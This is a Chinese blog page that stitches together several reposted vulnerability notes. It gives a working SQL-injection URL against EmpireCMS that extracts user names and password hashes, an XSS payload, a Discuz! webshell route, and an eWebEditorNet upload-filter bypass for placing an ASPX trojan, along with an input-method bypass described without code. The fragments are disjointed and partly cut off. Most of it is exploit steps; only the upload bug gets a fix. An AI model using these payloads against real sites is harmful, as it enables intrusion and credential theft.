飘零的代码 piao2010 ’s blog

转载：
无意发现了一个很严重的漏洞，和当年3389 输入法漏洞相似。 不过暂时不影响未系统未加载搜狗输入法（未登录系统）。如果远程服务器装了 搜狗，登录系统后加载了搜狗，而又未及时注销或kill掉搜狗输入法直接关闭了远程连接，那么这些server 就很危险咯。
测试环境：
OS: windows 7 ultimate
搜狗输入法 4.3 正式版
漏洞过程描述：

转载请保留版权，http://hacker-piao.cn  谢谢！
WP-ShortStat是一个不错的WordPress访问统计插件，可以在WordPress的管理界面中显示简单的访问统计信息。
发现这个漏洞其实很意外，今天早上打开博客shortstat的时候突然弹出窗口，应该是alert/xss/造成的。难道被黑了？查看了一下源文件，发现<tr><td><a href=”http://www.google.cn/search?hl=zh-CN&q=%3Cimg+src%3D%22%23%22+onerror%3Dalert%28%2Fxss%2F%29%3E&btnG=Google+%E6%90%9C%E7%B4%A2&aq=f&oq=” title=”/tags/xss/” rel=”nofollow”><img src=”#” onerror=alert(/xss/)></a></td>，打开链接发现是有人在Google中搜索<img src=”#” onerror=alert(/xss/)>关键词然后进入我的博客，

author: ring04h
team:http://www.80vul.com
[该漏洞由ring04h发现并且投递,thx]
由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell.

 
帝国ECMS /e/member/list/index.php文件:
if($sear){ $keyboard=RepPostVar2($_GET['keyboard']); if($keyboard) {  $add.=$where.$user_username.” like ‘%$keyboard%’”; } $search.=”&sear=1&keyboard=$keyboard”;}
判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为空就直接把keyboard带入查询产生注射漏洞.
利用方法:
/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9′+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*

/* * [ A PRODUCTION OF LUL-DISLCOSURE INC. ] * PROUDLY PRESENTS… * * [...]

转载请保留版权信息
PopSky ‘S Blog
http://www.popsky.org/
}
当访问eWebEditorNet/Upload.aspx时,可以看到只有浏览,缺少了上传按钮….

不过没关系,在选择好我们要上传的木马以后,直接再在IE当中输入javascript:lbtnUpload.click();回车

上传完毕了,看看返回的原代码…[鼠标右键点查看源文件]
parent.UploadError(’不允许上传此类型的文件！！’);
看来上传失败了…做了过滤,限制ASPX的文件上传了…..
继续回到前面,我们在地址后面打一个空格试试

parent.UploadSavedFinish(’20081232115126366.aspx ‘,’jackie.aspx ‘);history.back();
嘿嘿….绕过了限制……成功的上传了ASPX文件….
文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功…..

接下来,别再问我还能做什么了,我也不知道…..
总结:
1>
javascript:lbtnUpload.click(); 主语言为javascrypt,向当前页面的lbtnUpload发送一个单击事件…实际上也就相当于我们点了提交按钮,一样的….
2>
脚本里面限制了ASPX为后缀的文件不允许上传,再地址栏后加了一个空格(实际上加别的符号也行,例如 ‘ ),脚本获取到的文件名就为’aspx ‘,所以if xxx =’aspx’ then 这类型的判断语句就不好使了….修复方法为把不允许改为只允许……..